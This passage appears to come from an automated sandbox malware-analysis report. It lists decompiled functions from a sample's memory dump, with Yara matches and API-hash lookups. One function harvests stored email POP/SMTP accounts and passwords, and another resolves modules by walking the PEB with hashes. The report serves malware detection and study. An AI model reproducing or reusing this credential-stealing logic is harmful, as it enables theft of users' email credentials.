                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                                          0x00404a0d
                                          0x00404a15
                                          0x00404a18

                                          APIs
                                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                                          0x00403b72
                                          0x00403b7a
                                          0x00403b7d

                                          APIs
                                          • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID:
                                          • API String ID: 1174141254-0
                                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                          • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                          • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                          • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                                          0x00403fac
                                          0x00403fba
                                          0x00403fbe

                                          APIs
                                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                                          0x0040647f
                                          0x00406487
                                          0x0040648a

                                          APIs
                                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                                          0x004058f8
                                          0x00405903
                                          0x00405906

                                          APIs
                                          • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                          • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                          • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                          • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                                          0x00405932
                                          0x0040593d
                                          0x00405940

                                          APIs
                                          • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                          • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                          • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                          • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0040438F
                                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                          • VariantInit.OLEAUT32(?), ref: 004043C4
                                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                                          • VariantInit.OLEAUT32(?), ref: 00404414
                                          • SysAllocString.OLEAUT32(?), ref: 00404419
                                          • VariantInit.OLEAUT32(?), ref: 00404431
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                                          • String ID:
                                          • API String ID: 1312198159-0
                                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                                          0x0040d070
                                          0x0040d080
                                          0x0040d084
                                          0x0040d086
                                          0x0040d08c
                                          0x0040d0a0
                                          0x0040d0ae
                                          0x0040d0bd
                                          0x0040d0c0
                                          0x0040d0c5
                                          0x0040d0c9
                                          0x0040d0e3
                                          0x0040d0f2
                                          0x0040d101
                                          0x0040d104
                                          0x0040d109
                                          0x0040d110
                                          0x0040d11e
                                          0x0040d123
                                          0x0040d126
                                          0x0040d12d
                                          0x0040d145
                                          0x0040d154
                                          0x0040d15a
                                          0x0040d166
                                          0x0040d174
                                          0x0040d186
                                          0x0040d18e
                                          0x0040d19a
                                          0x0040d1ac
                                          0x0040d1ba
                                          0x0040d1cc
                                          0x0040d1d1
                                          0x0040d1dd
                                          0x0040d1e2
                                          0x0040d1e7
                                          0x0040d1e7
                                          0x0040d1e7
                                          0x0040d1eb
                                          0x0040d1f1
                                          0x0040d1f7
                                          0x0040d1ff
                                          0x0040d207
                                          0x0040d20f
                                          0x0040d217
                                          0x0040d21f
                                          0x0040d227
                                          0x0040d230

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                          • API String ID: 0-2111798378
                                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040317B, Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                                          0x0040317f
                                          0x00403180
                                          0x00403180
                                          0x00403180
                                          0x0040318d
                                          0x00403196
                                          0x00403199
                                          0x0040319b
                                          0x004031a1
                                          0x004031a9
                                          0x004031ab
                                          0x004031ac
                                          0x004031ae
                                          0x00000000
                                          0x004031b0
                                          0x004031b3
                                          0x004031c2
                                          0x004031c7
                                          0x004031cd
                                          0x004031e0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004031cd
                                          0x004031d7
                                          0x004031dd
                                          0x004031cf
                                          0x004031cf
                                          0x004031d1
                                          0x004031d5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                          Uniqueness

                                          Uniqueness Score: -1.00%